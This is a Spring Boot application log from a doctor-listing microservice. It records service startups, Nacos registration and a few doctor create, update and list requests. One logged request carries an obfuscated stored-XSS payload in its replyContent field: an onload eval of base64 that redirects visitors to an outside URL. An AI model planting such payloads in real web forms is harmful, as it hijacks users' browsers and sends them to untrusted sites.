08:36:54.428 [main] INFO o.r.Reflections - [scan,232] - Reflections took 27 ms to scan 1 urls, producing 3 keys and 6 values
08:36:54.451 [main] INFO o.r.Reflections - [scan,232] - Reflections took 10 ms to scan 1 urls, producing 4 keys and 9 values
08:36:54.470 [main] INFO o.r.Reflections - [scan,232] - Reflections took 18 ms to scan 1 urls, producing 3 keys and 10 values
08:36:54.477 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
08:36:54.484 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 1 keys and 7 values
08:36:54.491 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
08:36:54.493 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
08:36:54.493 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f63cd0
08:36:54.493 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f63ee0
08:36:54.494 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
08:36:54.494 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
08:36:54.500 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
08:36:55.809 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698367016361_10.100.1.1_62236
08:36:55.809 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] Notify connected event to listeners.
08:36:55.810 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
08:36:55.810 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
08:36:56.021 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
08:36:58.146 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
08:36:58.146 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
08:36:58.146 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
08:36:58.292 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
08:37:01.580 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
08:37:01.580 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
08:37:01.581 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
08:37:02.405 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
08:37:03.924 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 02645339-587b-4e59-a832-120f13c14be7
08:37:03.924 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] RpcClient init label, labels = {module=naming, source=sdk}
08:37:03.925 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
08:37:03.925 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
08:37:03.926 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
08:37:03.926 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
08:37:04.170 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698367024762_10.100.1.1_62242
08:37:04.170 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
08:37:04.170 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Notify connected event to listeners.
08:37:04.170 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
08:37:07.323 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
08:37:07.391 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
08:37:07.907 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Receive server push request, request = NotifySubscriberRequest, requestId = 1383
08:37:07.910 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [02645339-587b-4e59-a832-120f13c14be7] Ack server push request, request = NotifySubscriberRequest, requestId = 1383
08:37:08.798 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 17.99 seconds (JVM running for 18.974)
08:37:08.806 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
08:37:08.807 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
08:37:08.808 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
08:37:08.970 [RMI TCP Connection(3)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
08:45:09.639 [http-nio-10009-exec-1] INFO c.g.d.c.DoctorController - [doctorList,33] - 功能:医生信息 URI:/doctor/doctorList 方法POST 参数:[{"consultationPrice":"400.00","departmentId":3,"doctorCareer":"科室主任","doctorField":"新生儿黄痘,肺炎,脑膜炎,呼吸窗迫,新生儿贫血,肺动脉高压等各种新生儿重症的诊断及治疗,掌掘各种呼吸机使用,气管播管。心肺复苏等技术。","doctorHospital":"十堰协和医院","doctorId":1,"doctorName":"张三","doctorPicture":"","personalProfile":"2006年就读广州医学院医学研究生新生儿专业。导师为广东省妇幼保健院张晓庄院长,2009年顺利毕业并就职于广东省好幼保健院新生儿科重症监护室(ICu)。于2011年晋升为主治医师。2014年晋升为副主任医师并于同年共座华南大学医字博士。","replyContent":"<body/onload=e&#x76;&#x61;l&#x28;a&#x74;&#x6f;b&#x28;&#34;d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp&#34;&#x29;&#x29;>","replyStatus":2,"userId":1}]
10:13:17.481 [http-nio-10009-exec-3] INFO c.g.d.c.DoctorController - [doctorInsert,41] - 功能:添加医生信息 URI:/doctor/doctorInsert 方法POST 参数:{"consultationPrice":"200","departmentId":1,"doctorCareer":"主治医师","doctorField":"正骨,痔疮","doctorHospital":"安徽妇产医院","doctorName":"陈金海","doctorPicture":"","personalProfile":"还好","replyContent":"","replyStatus":1,"userId":1}
10:14:16.043 [http-nio-10009-exec-4] INFO c.g.d.c.DoctorController - [doctorInsert,41] - 功能:添加医生信息 URI:/doctor/doctorInsert 方法POST 参数:{"consultationPrice":"200","departmentId":1,"doctorCareer":"主治医师","doctorField":"正骨,痔疮","doctorHospital":"安徽第一人民医院","doctorName":"陈金海","doctorPicture":"","personalProfile":"还好","replyContent":"","replyStatus":1,"userId":1}
10:30:33.650 [http-nio-10009-exec-7] INFO c.g.d.c.DoctorController - [doctorUpdate,49] - 功能:修改医生信息 URI/doctor/doctorUpdate 方法DoctorRequest(doctorId=3, doctorName=张旭东, doctorHospital=福岛医院, doctorCareer=院长, doctorPicture=null, personalProfile=东桑,故乡的樱花又开了, doctorField=null, departmentId=null, replyStatus=null, replyContent=null, userId=null, consultationPrice=null) 参数:{"doctorCareer":"院长","doctorHospital":"福岛医院","doctorId":3,"doctorName":"张旭东","personalProfile":"东桑,故乡的樱花又开了"}
10:48:49.890 [http-nio-10009-exec-6] INFO c.g.d.c.DoctorController - [doctorUpdate,49] - 功能:修改医生信息 URI/doctor/doctorUpdate 方法DoctorRequest(doctorId=null, doctorName=null, doctorHospital=null, doctorCareer=null, doctorPicture=null, personalProfile=null, doctorField=null, departmentId=null, replyStatus=null, replyContent=null, userId=1, consultationPrice=null) 参数:{"userId":1}
11:16:10.446 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
11:16:10.492 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
11:16:10.825 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
11:16:10.825 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@3f52b37c[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
11:16:10.825 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698367024762_10.100.1.1_62242
11:16:10.831 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@6c6975cf[Running, pool size = 4, active threads = 0, queued tasks = 0, completed tasks = 1911]
11:16:10.972 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
11:16:10.975 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
11:16:10.981 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
11:16:10.981 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye
11:16:19.666 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
11:16:25.072 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
11:16:26.812 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0
11:16:26.857 [main] INFO o.r.Reflections - [scan,232] - Reflections took 23 ms to scan 1 urls, producing 3 keys and 6 values
11:16:26.877 [main] INFO o.r.Reflections - [scan,232] - Reflections took 10 ms to scan 1 urls, producing 4 keys and 9 values
11:16:26.887 [main] INFO o.r.Reflections - [scan,232] - Reflections took 7 ms to scan 1 urls, producing 3 keys and 10 values
11:16:26.904 [main] INFO o.r.Reflections - [scan,232] - Reflections took 16 ms to scan 1 urls, producing 1 keys and 5 values
11:16:26.911 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 7 values
11:16:26.918 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 2 keys and 8 values
11:16:26.920 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
11:16:26.921 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f63cd0
11:16:26.921 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f63ee0
11:16:26.921 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
11:16:26.922 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
11:16:26.927 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
11:16:28.135 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698376588440_10.100.1.1_63854
11:16:28.136 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] Notify connected event to listeners.
11:16:28.136 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
11:16:28.136 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [31ab721d-7637-4a2c-9b36-2f77869bb0a0_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
11:16:28.354 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
11:16:30.202 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
11:16:30.203 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
11:16:30.203 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
11:16:30.338 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
11:16:33.475 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
11:16:33.476 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
11:16:33.476 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
11:16:34.298 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
11:16:35.847 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 3b49e55d-351c-488a-8fc6-4d3705b4d2cf
11:16:35.848 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] RpcClient init label, labels = {module=naming, source=sdk}
11:16:35.849 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
11:16:35.849 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
11:16:35.850 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
11:16:35.850 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
11:16:36.075 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698376596422_10.100.1.1_63863
11:16:36.076 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
11:16:36.076 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Notify connected event to listeners.
11:16:36.076 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
11:16:39.272 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
11:16:39.329 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
11:16:39.809 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Receive server push request, request = NotifySubscriberRequest, requestId = 1409
11:16:39.812 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [3b49e55d-351c-488a-8fc6-4d3705b4d2cf] Ack server push request, request = NotifySubscriberRequest, requestId = 1409
11:16:40.755 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 17.406 seconds (JVM running for 18.28)
11:16:40.763 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
11:16:40.764 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
11:16:40.765 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
11:16:41.271 [RMI TCP Connection(1)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
11:21:23.535 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
11:21:23.575 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
11:21:23.904 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
11:21:23.904 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@3c94c572[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
11:21:23.905 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698376596422_10.100.1.1_63863
11:21:23.909 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@2b946687[Running, pool size = 4, active threads = 0, queued tasks = 0, completed tasks = 68]
11:21:24.035 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
11:21:24.038 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
11:21:24.041 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
11:21:24.041 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye
11:21:28.772 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
11:21:30.511 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 7e094e20-27b1-4745-8400-a4e37fb235e9_config-0
11:21:30.555 [main] INFO o.r.Reflections - [scan,232] - Reflections took 23 ms to scan 1 urls, producing 3 keys and 6 values
11:21:30.575 [main] INFO o.r.Reflections - [scan,232] - Reflections took 9 ms to scan 1 urls, producing 4 keys and 9 values
11:21:30.593 [main] INFO o.r.Reflections - [scan,232] - Reflections took 16 ms to scan 1 urls, producing 3 keys and 10 values
11:21:30.600 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
11:21:30.607 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 7 values
11:21:30.615 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
11:21:30.617 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
11:21:30.618 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f63cd0
11:21:30.618 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f63ee0
11:21:30.618 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
11:21:30.618 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
11:21:30.624 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
11:21:31.834 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698376892117_10.100.1.1_62330
11:21:31.835 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] Notify connected event to listeners.
11:21:31.835 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
11:21:31.835 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7e094e20-27b1-4745-8400-a4e37fb235e9_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
11:21:32.420 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
11:21:34.190 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
11:21:34.190 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
11:21:34.191 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
11:21:34.327 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
11:21:37.361 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
11:21:37.362 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
11:21:37.362 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
11:21:38.173 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
11:21:39.705 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 0516adaf-cd21-457e-a927-efd0dd3867c3
11:21:39.705 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] RpcClient init label, labels = {module=naming, source=sdk}
11:21:39.707 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
11:21:39.707 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
11:21:39.707 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
11:21:39.708 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
11:21:39.938 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698376900271_10.100.1.1_62345
11:21:39.939 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
11:21:39.939 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Notify connected event to listeners.
11:21:39.939 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
11:21:43.109 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
11:21:43.173 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
11:21:43.666 [nacos-grpc-client-executor-8] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Receive server push request, request = NotifySubscriberRequest, requestId = 1410
